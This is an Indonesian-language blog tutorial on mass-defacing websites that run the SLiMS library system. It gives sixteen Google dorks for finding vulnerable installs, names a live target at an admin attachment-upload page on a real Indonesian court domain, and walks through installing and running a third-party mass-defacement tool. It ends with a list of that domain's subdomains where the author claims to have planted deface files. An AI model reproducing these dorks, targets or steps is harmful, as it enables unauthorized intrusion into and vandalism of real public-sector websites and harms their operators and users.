Hallo , Ini konten kedua yaa yang dibikin sama elvina
Exploit slims ini beda nya dari yang manual ya udah
Mass Temper + subdomain sama website utama bisa
Di exploitasi juga lho :b
yaa langsung aja ya elvina kasih tutorial nya :b
#Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 5 : Powered by SLiMS site:id
#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.
#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
#Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System.
It is build on Open source technology like PHP and MySQL.
#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3
#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC
yaa kalian pilih dan kembangin sendiri ya dork nya :b
disini elvina kasih Live Target aja ya buat kalian :
Live Target :
http://pa-purwodadi.go.id/katalog//admin/modules/bibliography/pop_attach.php
yaa kurang lebih tampilan nya seperti ini :
tetapi disini kita pakai tools buatan odiq & temanku alqiyaramdana , bisa di pakai di termux/linux/cmd
pkg update && pkg upgrade
pkg install python2
pkg install pip2
pip2 install colorama
pip2 install bs4
pip2 install requests
pkg install git
git clone https://github.com/Odiq1337/slimass
cd slimass
Kalau udah selesai semua tinggal buat file deface kalian ketik
nano file defacemu.txt
nano indo.txt (punya elvina :b)
Isi file defacemu seperti ini
habis itu save ctrl+x+y
next
python2 slim.py filedefacemu.txt
sisanya tinggal masukan website + exploit nya kemudian eksekusi jika vuln maka hasilnya yang warna hijau yg gak vuln warna merah , seperti ini :
dan ini hasil punya elvina :
http://www.pa-purwodadi.go.id/ownd.txt
http://sipp.pa-purwodadi.go.id/ownd.txt
http://arsip.pa-purwodadi.go.id/ownd.txt
http://e-tara.pa-purwodadi.go.id/ownd.txt
http://awan.pa-purwodadi.go.id/ownd.txt
yaa sekian aja tutorial elvina kali ini byee byee !
Sumber :